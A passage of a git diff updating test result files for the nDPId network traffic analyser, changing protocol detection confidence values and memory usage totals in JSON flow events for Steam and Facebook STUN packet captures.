+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164987,"flow_last_seen":1357332165148,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"208.111.133.85","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165238,"flow_last_seen":1357332165425,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164986,"flow_last_seen":1357332165166,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165088,"flow_last_seen":1357332165279,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164937,"flow_last_seen":1357332165121,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27017,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165337,"flow_last_seen":1357332165520,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165038,"flow_last_seen":1357332165230,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164737,"flow_last_seen":1357332164925,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164693,"flow_last_seen":1357332164876,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165087,"flow_last_seen":1357332165270,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.15","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332165237,"flow_last_seen":1357332165424,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.13","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00673{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164836,"flow_last_seen":1357332165015,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.14","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1357332164693,"flow_last_seen":1357332164892,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1357332165983,"l3_proto":"ip4","src_ip":"192.168.188.149","dst_ip":"146.66.152.12","src_port":45665,"dst_port":27019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":104,"source":"steam.pcap","alias":"nDPId-test","packets-captured":104,"packets-processed":104,"total-skipped-flows":0,"total-l4-payload-len":4652,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":55,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":55,"total-idle-flows":55,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":264,"global_ts_msec":1357332165983} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 104/104 @@ -270,9 +270,9 @@ ~~ total active/idle flows...: 55/55 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5929699 bytes -~~ total memory freed........: 5929699 bytes -~~ total allocations/frees...: 118434/118434 +~~ total memory allocated....: 6063333 bytes +~~ total memory freed........: 6063333 bytes +~~ total allocations/frees...: 121196/121196 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 681 chars diff --git a/test/results/steam_datagram_relay_ping.pcapng.out b/test/results/steam_datagram_relay_ping.pcapng.out index 2e194f4ac..2aa78b493 100644 --- a/test/results/steam_datagram_relay_ping.pcapng.out +++ b/test/results/steam_datagram_relay_ping.pcapng.out @@ -2,9 +2,9 @@ 00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1625599888890} 00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625599888890,"flow_last_seen":1625599888890,"flow_idle_time":200000,"flow_min_l4_payload_len":1300,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1300,"flow_avg_l4_payload_len":1300,"midstream":0,"thread_ts_msec":1625599888890,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"139.45.193.10","src_port":52157,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02194{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1625599888890,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1342,"pkt_l4_len":1308,"thread_ts_msec":1625599888890,"pkt":"eJS0JASgYDjgxTWgCABFAAUwjsUAAH8RmLPAqAJkiy3BCsu9aYoFHNuQAQFzZHBpbmeh3CnjmWUAAAAAAAA\/AQAAk6QtixMMCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625599888890,"flow_last_seen":1625599888890,"flow_idle_time":200000,"flow_min_l4_payload_len":1300,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1300,"flow_avg_l4_payload_len":1300,"midstream":0,"thread_ts_msec":1625599888890,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"139.45.193.10","src_port":52157,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625599888890,"flow_last_seen":1625599888890,"flow_idle_time":200000,"flow_min_l4_payload_len":1300,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":1300,"flow_avg_l4_payload_len":1300,"midstream":0,"thread_ts_msec":1625599888890,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"139.45.193.10","src_port":52157,"dst_port":27018,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 02194{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1625599891412,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1342,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1342,"pkt_l4_len":1308,"thread_ts_msec":1625599891412,"pkt":"eJS0JASgYDjgxTWgCABFAAUwjsYAAH8RmLLAqAJkiy3BCsu9aYoFHPISAQFzZHBpbmdkWlDjmWUAAAAAAAA\/AQAAk6QtixMMCgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} -00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625599888890,"flow_last_seen":1625599891412,"flow_idle_time":200000,"flow_min_l4_payload_len":1300,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2600,"flow_avg_l4_payload_len":1300,"midstream":0,"thread_ts_msec":1625599891412,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"139.45.193.10","src_port":52157,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625599888890,"flow_last_seen":1625599891412,"flow_idle_time":200000,"flow_min_l4_payload_len":1300,"flow_max_l4_payload_len":1300,"flow_tot_l4_payload_len":2600,"flow_avg_l4_payload_len":1300,"midstream":0,"thread_ts_msec":1625599891412,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"139.45.193.10","src_port":52157,"dst_port":27018,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Steam","breed":"Fun","category":"Game"}} 00572{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":2,"source":"steam_datagram_relay_ping.pcapng","alias":"nDPId-test","packets-captured":2,"packets-processed":2,"total-skipped-flows":0,"total-l4-payload-len":2600,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":8,"global_ts_msec":1625599891412} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 2/2 @@ -14,9 +14,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5869501 bytes -~~ total memory freed........: 5869501 bytes -~~ total allocations/frees...: 118116/118116 +~~ total memory allocated....: 6003135 bytes +~~ total memory freed........: 6003135 bytes +~~ total allocations/frees...: 120878/120878 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 483 chars ~~ json string max len.......: 2199 chars diff --git a/test/results/stun_facebook.pcapng.out b/test/results/stun_facebook.pcapng.out index 5557826b4..66d70a504 100644 --- a/test/results/stun_facebook.pcapng.out +++ b/test/results/stun_facebook.pcapng.out @@ -3,9 +3,9 @@ 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1629291451242,"flow_last_seen":1629291451242,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1629291451242,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"31.13.86.54","src_port":38123,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1629291451242,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1629291451242,"pkt":"CL6sCxdumt9Y+uvcCABFAAA4VYJAAEARop7AqAypHw1WNpTrnEMAJO1IAAMACCESpEJBSzdRUHlQSzlldVYAGQAEEQAAAA=="} 00582{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1629291451254,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":146,"pkt_l4_len":112,"thread_ts_msec":1629291451254,"pkt":"mt9Y+uvcCL6sCxduCABFAACER+pAAFURmuofDVY2wKgMqZxDlOsAcMgPARMAVCESpEJBSzdRUHlQSzlldVYACQAQAAAEAXVuYXV0aG9yaXplZAAVAChiYjAzMWQ2MWNjYzFiZTgyZTI0MDE0NDM1ZWQ1MmYyNmZiYTYyNDgzABQAD3R1cm5lci5mYWNlYm9vawA="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1629291451242,"flow_last_seen":1629291451254,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1629291451254,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"31.13.86.54","src_port":38123,"dst_port":40003,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.FacebookVoip","breed":"Acceptable","category":"VoIP"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1629291451242,"flow_last_seen":1629291451254,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":104,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":66,"midstream":0,"thread_ts_msec":1629291451254,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"31.13.86.54","src_port":38123,"dst_port":40003,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"STUN.FacebookVoip","breed":"Acceptable","category":"VoIP"}} 00626{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1629291451258,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":178,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":178,"pkt_l4_len":144,"thread_ts_msec":1629291451258,"pkt":"CL6sCxdumt9Y+uvcCABFAACkVYNAAEARojHAqAypHw1WNpTrnEMAkHyWAAMAdCESpEI1elVqTVhIdmV3K3MAGQAEEQAAAAAGABBNZjJoOUhpNWFQTVJwbEYxABQAD3R1cm5lci5mYWNlYm9vawAAFQAoYmIwMzFkNjFjY2MxYmU4MmUyNDAxNDQzNWVkNTJmMjZmYmE2MjQ4MwAIABSHhqaIN2rgJVJbblyGsNjNga5wAA=="} -00833{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":75,"source":"stun_facebook.pcapng","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":75,"flow_first_seen":1629291451242,"flow_last_seen":1629291461336,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":7404,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1629291461336,"l3_proto":"ip4","src_ip":"192.168.12.169","dst_ip":"31.13.86.54","src_port":38123,"dst_port":40003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.FacebookVoip","breed":"Acceptable","category":"VoIP"}} 